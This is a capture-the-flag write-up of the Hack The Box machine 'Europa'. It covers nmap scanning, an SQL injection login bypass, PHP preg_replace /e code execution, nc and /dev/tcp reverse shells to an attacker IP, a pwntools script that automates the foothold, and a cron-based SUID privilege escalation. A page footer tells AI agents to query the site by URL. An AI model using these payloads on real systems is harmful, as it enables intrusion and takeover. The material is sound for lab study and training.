# Europa
## Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.22 -oN allPorts
* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.
```
# Nmap 7.92 scan initiated Wed Jan 12 18:13:52 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.22
Nmap scan report for 10.10.10.22
Host is up (0.076s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
# Nmap done at Wed Jan 12 18:14:19 2022 -- 1 IP address (1 host up) scanned in 27.11 seconds
```
As we see, ports 22,80,443 are open. Let's try to obtain more information about the service and version running on those ports. The following command will scan these ports more in depth and save the result into a file:
> nmap -sC -sV -p22,80,443 10.10.10.22 -oN targeted
* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.
```
# Nmap 7.92 scan initiated Wed Jan 12 18:15:53 2022 as: nmap -sCV -p22,80,443 -oN targeted 10.10.10.22
Nmap scan report for 10.10.10.22
Host is up (0.056s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_ 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after: 2027-04-17T09:06:22
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 18:16:14 2022 -- 1 IP address (1 host up) scanned in 21.18 seconds
```
We have an *HTTPS* server, and nmap detected the `europacorp.htb` and the `admin-portal.europacorp.htb` domain names. Let's include them to the `/etc/hosts` file.
```
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.22 europa.htb admin-portal.europacorp.htb
```
{% hint style="info" %}
**Virtual hosting** is a method for hosting multiple domain names (with separate handling of each name) on a single server.
{% endhint %}
If we search for the `admin-portal.europacorp.htb` domain name on the browser we should see a login page.
## Exploitation
At this point I tried some random credentials, but I couldn't get in. So I tried to do an SQL Injection attack. Let's try some random credentials, intercept the request with *Burpsuite* and send it to the *Repeater*.
If we try to modify the request adding the `'` character at the end of the email we will get an SQL error.
> email=admin%40admin.com'\&password=admin
If we can select all the columns of the current table, we'll be able to pass through the login page. To know how many columns there are, we will have to make a `union select 1,2-- -` query. If we try with only2 columns, we'll get an error saying that there is not that number of columns.
> email=admin%40admin.com'union select 1,2-- -\&password=admin
If we try 3 columns we'll get the same error. But, if we keep trying, will get a *302* response with 5 columns.
> email=admin%40admin.com'union select 1,2,3,4,5-- -\&password=admin
Let's put that query in the `Proxy > Intercept` and forward it. We shloud pass through the login page.
If we click on the *Tools* section, we will see a text in a *JSON* format in which we can replace the `ip_address` field with anything that we introduce.
If we introduce some random text we should see it appear where the `ip_address` value was.
If we intercept the previous request with *Burpsuite* and send it to the repeater, we'll see that the the `ip_address` value is between the `/` characters.
> pattern=/ip\_address/\&ipaddress=alfa8sa\&text=...
At this point, I searched for PHP regular expressions vulnerabilities and I found [this article](https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace), which explains that you could have *Remote Code Execution (RCE)* by adding the `e` modifier after the second `/`.
> pattern=/ip\_address/e\&ipaddress=system('whoami')\&text=...
Time to get a shell. Let's set a netcat listener on port 4444.
> nc -lvnp 4444
* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.
Now, instead of executing `whoami`, let's run a command to get us a reverse shell. We will get the shell as the *www-data* user, and we'll be able to grab the user flag.
> pattern=/ip\_address/e\&ipaddress=system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4444 >/tmp/f')\&text=...
```
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.22] 59000
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/john/user.txt
2f8d40cc05295154a9c3452c19ddc221
```
Here's a python script which automates getting initial foothold.
```python
#!/usr/bin/python3
from pwn import *
import requests
import urllib3
def def_handler(sig, frame):
print('\n[!] Saliendo...')
sys.exit(1)
# Ctrl+C
signal.signal(signal.SIGINT, def_handler)
login_url = "https://admin-portal.europacorp.htb/login.php"
exploit_url = "https://admin-portal.europacorp.htb/tools.php"
def makeRequest():
urllib3.disable_warnings()
s = requests.session()
s.verify = False
post_data = {
"email": "admin%40europacorp.htb' union select 1,2,3,4,5-- -+",
"password": "admin"
}
r = s.post(login_url, data=post_data)
post_data = {
"pattern": "/ip_address/e",
"ipaddress": """system("bash -c 'bash -i >& /dev/tcp/10.10.14.9/4444 0>&1'")""",
"text": '"ip_address"'
}
r = s.post(exploit_url, data=post_data)
if __name__ == '__main__':
try:
threading.Thread(target=makeRequest, args=()).start()
except Exception as e:
log.error(str(e))
shell = listen(4444, timeout=20).wait_for_connection()
shell.interactive()
```
## Privilege Escalation
First of all, let's set an interactive *TTY* shell.
> script /dev/null -c /bin/bash
Then I press `Ctrl+Z` and execute the following command on my local machine:
> stty raw -echo; fg
Next, I export a few variables:
> export TERM=xterm
>
> export SHELL=bash
Finally, I run the following command in our local machine:
> stty size
```
51 236
```
And set the proper dimensions in the victim machine:
> stty rows 51 columns 236
We can see there is a crontab task running as root.
> cat /etc/crontab
```
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /var/www/cronjobs/clearlogs
```
Let's try to see what is the content of that file.
```php
#!/usr/bin/php
```
It is a *PHP* file, which replace the content of a file with an empty string and then executes a bash binary. Let's find out more information about that binary.
> ls -l /var/www/cmd/logcleared.sh
```
ls: cannot access '/var/www/cmd/logcleared.sh': No such file or directory
```
The file doesn't exists. The idea is to create that file and write a bash command which gives the `/bin/bash` the *SUID* permission. So when the crontab task is executed as the root user, we'll be able to get a shell as root.
> nano /var/www/cmd/logcleared.sh
```bash
#!/bin/bash
chmod +s /bin/bash
```
If we wait for 1 minute, we'll see that the *SUID* bit gets activated on the `/bin/bash` binary.
> ls -l /bin/bash
```
-rwsr-sr-x 1 root root 1037528 May 16 2017 /bin/bash
```
Now all we have to do is reap the harvest and take the root flag.
> bash -p
```
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
7f19438b27578e4fcc8bef3a029af5a5
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/europa.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.